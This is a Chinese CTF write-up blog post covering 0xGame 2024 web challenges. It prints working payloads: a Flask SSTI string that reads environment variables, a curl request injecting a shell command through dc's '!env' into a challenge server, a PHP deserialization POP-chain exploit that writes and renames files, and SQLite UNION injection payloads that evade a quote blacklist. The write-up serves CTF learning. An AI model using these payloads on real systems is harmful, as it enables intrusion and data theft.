首页 > 其他分享 >0xgame 2024

0xgame 2024

时间:2024-10-30 12:57:58浏览次数:1  
标签:__ function name 0xgame public 2024 NULL class

做不过来了,就跟着做了一点

第一周

#### ez_ssti

from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)

flag=os.getenv("flag")
os.unsetenv("flag")
@app.route('/')
def index():
    return open(__file__, "r").read()


@app.errorhandler(404)
def page_not_found(e):
    print(request.root_url)
    return render_template_string("The Url {} You Requested Can Not Found".format(request.url))

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8000)

直接在url后面添加

{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}

即可

ez_rce

from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/")
def index():
    return open(__file__).read()

@app.route("/calc", methods=['POST'])
def calculator():
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)
    return result.stdout

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

直接rce

curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"

hello_web

签到

hello_http

http题目

ez_unser

php反序列化

<?php
highlight_file(__FILE__);
class Man{
    private $name="原神,启动";
    public function __wakeup()
    {
        echo str_split($this->name);
    }
}
class What{
    private $Kun="两年半";
    public function __toString()
    {

        echo $this->Kun->hobby;
        return "Ok";
    }
}
class Can{
    private $Hobby="唱跳rap篮球";
    public function __get($name)
    {
        var_dump($this->Hobby);
    }
}
class I{
    private $name="Kobe";
    public function __debugInfo()
    {
        $this->name->say();
    }

}
class Say{
    private $evil;
    public function __call($name, $arguments)
    {
        $this->evil->Evil();
    }
}
class Mamba{
    public function Evil()
    {
        $filename=time().".log";
        file_put_contents($filename,$_POST["content"]);
        echo $filename;

    }
}
class Out{
    public function __call($name,$arguments)
    {
        $o = "./".str_replace("..", "第五人格",$_POST["o"]);
        $n = $_POST["n"];
        rename($o,$n);
    }
}
unserialize($_POST["data"]); 

链子从上往下就行,先写个文件,然后去改名.exp如下.

<?php
highlight_file(__FILE__);
class Man{
    private $name;
    public function setname($name){
        $this->name = $name;
    }
}
class What{
    private $Kun;
    public function setKun($Kun){
        $this->Kun = $Kun;
    }
}
class Can{
    private $Hobby;
    public function setHobby($Hobby){
        $this->Hobby = $Hobby;
    }
}
class I{
    private $name;
    public function setname($name){
        $this->name = $name;
    }
}
class Say{
    private $evil;
    public function setevil($evil){
        $this->evil = $evil;
    }
}
class Mamba{
}
class Out{
}
$a = new Man();
$b = new What();
$c = new Can();
$d = new I();
$e = new Say();
$f = new Mamba();
//$f = new Out();
$e->setevil($f);
$d->setname($e);
$c->setHobby($d);
$b->setKun($c);
$a->setname($b);
echo serialize($a); 

ez_login

弱密码,admin/admin123

ez_sql

sqlite注入有黑名单,扔个fuzz看看,发现单双引号被枪毙了.
没有单双引号,可以使用char()去拼凑字符串.数字注入不用担心闭合.
用order by判断了列数为5(虽然直接看也像是5),然后构造payload.

UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--

标签:__,function,name,0xgame,public,2024,NULL,class
From: https://www.cnblogs.com/meraklbz/p/18515647

相关文章

  • CSP-S2024 全网首发
                                            T1:决斗题目描述Description今天是小Q的生日,他得到了n张卡牌作为礼物。这些卡牌属于火爆的“决斗怪兽”,其中,第i张卡代表一只攻击力为ri,防御力也为ri的怪兽。一场游戏分为若干回......
  • Windows Server 2022 OVF, updated Oct 2024 (sysin) - VMware 虚拟机模板
    WindowsServer2022OVF,updatedOct2024(sysin)-VMware虚拟机模板2024年10月版本更新,现在自动运行sysprep,支持ESXiHostClient部署请访问原文链接:https://sysin.org/blog/windows-server-2022-ovf/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org现......
  • Windows Server 2019 OVF, updated Oct 2024 (sysin) - VMware 虚拟机模板
    WindowsServer2019OVF,updatedOct2024(sysin)-VMware虚拟机模板2024年10月版本更新,现在自动运行sysprep,支持ESXiHostClient部署请访问原文链接:https://sysin.org/blog/windows-server-2019-ovf/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWin......
  • Windows Server 2019 中文版、英文版下载 (updated Oct 2024)
    WindowsServer2019中文版、英文版下载(updatedOct2024)WindowsServer2019Version1809请访问原文链接:https://sysin.org/blog/windows-server-2019/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本站将不定期发布官方原版风格月度更新ISO。WindowsSe......
  • Windows Server 2016 OVF, updated Oct 2024 (sysin) - VMware 虚拟机模板
    WindowsServer2016OVF,updatedOct2024(sysin)-VMware虚拟机模板2024年10月版本更新,现在自动运行sysprep,支持ESXiHostClient部署请访问原文链接:https://sysin.org/blog/windows-server-2016-ovf/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org现......
  • Windows Server 2016 中文版、英文版下载 (updated Oct 2024)
    WindowsServer2016中文版、英文版下载(updatedOct2024)WindowsServer2016Version1607请访问原文链接:https://sysin.org/blog/windows-server-2016/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本站将不定期发布官方原版风格月度更新ISO。WindowsSe......
  • Windows Server 2008 R2 OVF, updated Aug 2024 (sysin) - VMware 虚拟机模板
    WindowsServer2008R2OVF,updatedAug2024(sysin)-VMware虚拟机模板WindowsServer2008R2简体中文版OVF,2024年10月更新请访问原文链接:https://sysin.org/blog/windows-server-2008-r2-ovf/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWindows......
  • Windows 7 & Windows Server 2008 R2 简体中文版下载 (updated Oct 2024)
    Windows7&WindowsServer2008R2简体中文版下载(updatedOct2024)Windows7&WindowsServer2008R2(2024年10月更新)请访问原文链接:https://sysin.org/blog/windows-7/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWindows7&WindowsServer2008......
  • <<程序员修炼之道-从小工到专家>> -2024/10/28
    《程序员修炼之道》是一本经典的编程与软件开发书籍,涵盖了程序员成长过程中需要掌握的多方面内容。读后感可以从以下几个方面来总结:职业心态:书中强调了程序员应具备的职业素养与心态,如对工作的热爱、持续学习的精神,以及对代码质量的追求。这让我意识到,技术能力固然重要,但态度同样......
  • 数字时代的领航者,不容错过的巅峰盛会——The Open Group 2024大会盛情邀约
    随着全球数字化革命的深入推进,企业正面临着前所未有的挑战和机遇。如何在激烈的市场竞争中脱颖而出,实现可持续发展,已成为各行业领袖和专业人士共同关注的焦点。TheOpenGroup2024生态系统架构·可持续发展年度大会即将隆重举行,汇聚全球顶尖专家和业界翘楚,为您揭示数字化转型......